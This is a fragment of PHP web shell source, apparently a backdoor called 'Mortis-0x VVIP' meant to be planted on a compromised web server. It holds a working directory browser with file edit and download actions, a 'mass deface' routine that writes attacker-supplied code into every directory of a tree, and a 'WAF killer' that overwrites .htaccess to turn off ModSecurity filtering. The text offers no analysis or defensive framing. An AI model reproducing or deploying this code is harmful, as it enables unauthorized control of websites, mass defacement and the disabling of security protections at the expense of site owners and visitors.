'; exit; } // --- AUTOMATIC ROOT DISCOVERY --- $dir = isset($_GET['d']) ? $_GET['d'] : getcwd(); $dir = str_replace('\\', '/', $dir); chdir($dir); // --- VVIP: MASS DEFACE PRO --- if(isset($_POST['run_mass'])) { $m_dir = $_POST['m_dir']; $m_file = $_POST['m_file']; $m_code = $_POST['m_code']; $it = new RecursiveDirectoryIterator($m_dir); foreach(new RecursiveIteratorIterator($it) as $file) { if(basename($file) == $m_file || is_dir($file)) { @file_put_contents($file.'/'.$m_file, $m_code); } } $msg = "MASSIVE TEBAS SUCCESS!"; } // --- VVIP: WAF KILLER (HTACCESS OVERRIDE) --- if(isset($_GET['kill_waf'])) { $htaccess = "SecFilterEngine Off\nSecFilterScanPOST Off"; @file_put_contents('.htaccess', $htaccess); $msg = "WAF DISABLED VIA .HTACCESS"; } echo 'Mortis-0x VVIP

MORTIS-0x VVIP

LOGOUT
PATH: '.getcwd().'
WAF KILLER
'.(isset($msg) ? '
[!] '.$msg.'
' : '').' ⇡ UP ONE LEVEL
'; $files = scandir($dir); foreach($files as $f){ if($f == "." || $f == "..") continue; $p = $dir.'/'.$f; $sz = is_dir($p) ? "-" : round(filesize($p)/1024, 2)." KB"; echo ""; } echo '
NAMESIZEPERMSACTION
".(is_dir($p) ? "📁 $f" : "📄 $f")." $sz ".substr(sprintf('%o', fileperms($p)), -4)." Edit Get
'.(isset($_GET['edit']) ? '
EDITING: '.basename($_GET['edit']).'
' : '').'
'; ?>